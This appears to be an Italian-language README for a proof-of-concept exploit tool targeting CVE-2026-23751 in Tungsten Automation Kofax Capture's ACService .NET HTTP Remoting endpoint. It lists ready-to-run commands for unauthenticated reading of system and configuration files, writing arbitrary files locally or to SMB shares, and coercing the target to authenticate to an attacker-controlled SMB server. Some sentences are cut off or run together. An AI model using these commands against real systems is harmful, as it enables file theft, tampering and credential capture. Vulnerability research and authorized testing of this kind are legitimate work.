
Patched RemotingClient per sfruttare CVE-2026-23751 (Tungsten Automation - Kofax Capture lettura/scrittura file non autenticata e coercizione SMB tramite .NET HTTP Remoting)
Reimplementazione proof-of-concept della tecnica descritta in Code White's NewRemotingTricks, che mira a Tungsten Automation Kofax Capture.
Titolo: Tungsten Automation - Kofax Capture Lettura/Scrittura File Non Autenticata e Coercizione SMB tramite .NET HTTP Remoting
CVE: CVE-2026-23751
CVE-2026-23751 colpisce Tungsten Automation Kofax Capture e consente a un attaccante remoto non autenticato di interagire con un endpoint .NET HTTP Remoting esposto dal ACService di Kofax Capture.
La vulnerabilità può essere sfruttata per eseguire:
Il PoC reimplementa la tecnica .NET Remoting rilevante dal progetto NewRemotingTricks di Code White.
Il PoC prende di mira l'endpoint HTTP Remoting ACService di Kofax Capture:
http://<target>:2424/ACService
La porta 2424 è la porta HTTP Remoting predefinita utilizzata dal servizio interessato.
L'esempio seguente legge il file hosts di Windows dal target:
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\Windows\System32\drivers\etc\hosts
Un file di configurazione di Kofax Capture può essere letto allo stesso modo:
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\ProgramData\Kofax\Remoting\Client\Configuration\ConfigInfo.xml
Un file può essere scritto in una posizione accessibile dal servizio Kofax Capture fornendo il percorso di destinazione seguito dal contenuto:
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\Windows\Temp\test.txt HelloWorld
La stessa funzionalità può essere utilizzata con un percorso UNC per scrivere su una condivisione SMB remota:
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService \\<remote_host>\share\file.txt HelloWorld
La capacità di accedere alla risorsa remota dipende dalle autorizzazioni e dal contesto di sicurezza del servizio Kofax Capture.
È possibile fornire un URI file:// per indurre il target ad accedere a una risorsa SMB remota:
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService file://\\<attacker>\file\file.txt
Ciò può indurre l'host interessato ad autenticarsi al server SMB controllato dall'attaccante, a seconda dell'ambiente target e della sua configurazione di sicurezza.
La vulnerabilità coinvolge l'uso di .NET HTTP Remoting da parte del ACService di Kofax Capture.
.NET Remoting supporta vari schemi URI e meccanismi di serializzazione degli oggetti. Interagendo con l'endpoint remoting esposto in un modo specifico, un client non autenticato può indurre il servizio a eseguire operazioni sul file system utilizzando percorsi forniti dal client.
Il PoC dimostra come questo comportamento possa essere utilizzato per:
file:// remoteIl PoC attualmente dimostra la scrittura di dati stringa su file. Altri tipi di file e formati di payload possono essere supportati modificando di conseguenza il codice sorgente.
Questa implementazione si basa su ricerche e tecniche presentate in:
Code White - NewRemotingTricks
ACService di Kofax Capture del targetRemotingClient_MBRO_Lazy.exeNon è richiesta alcuna autenticazione al servizio Kofax Capture per lo sfruttamento.
Questo repository è fornito esclusivamente per ricerca sulla sicurezza, validazione delle vulnerabilità e test di penetrazione autorizzati.
Non utilizzare questo PoC contro sistemi senza esplicita autorizzazione. L'autore non è responsabile di danni, perdita di dati, accessi non autorizzati o altre conseguenze derivanti dall'uso improprio di questo software.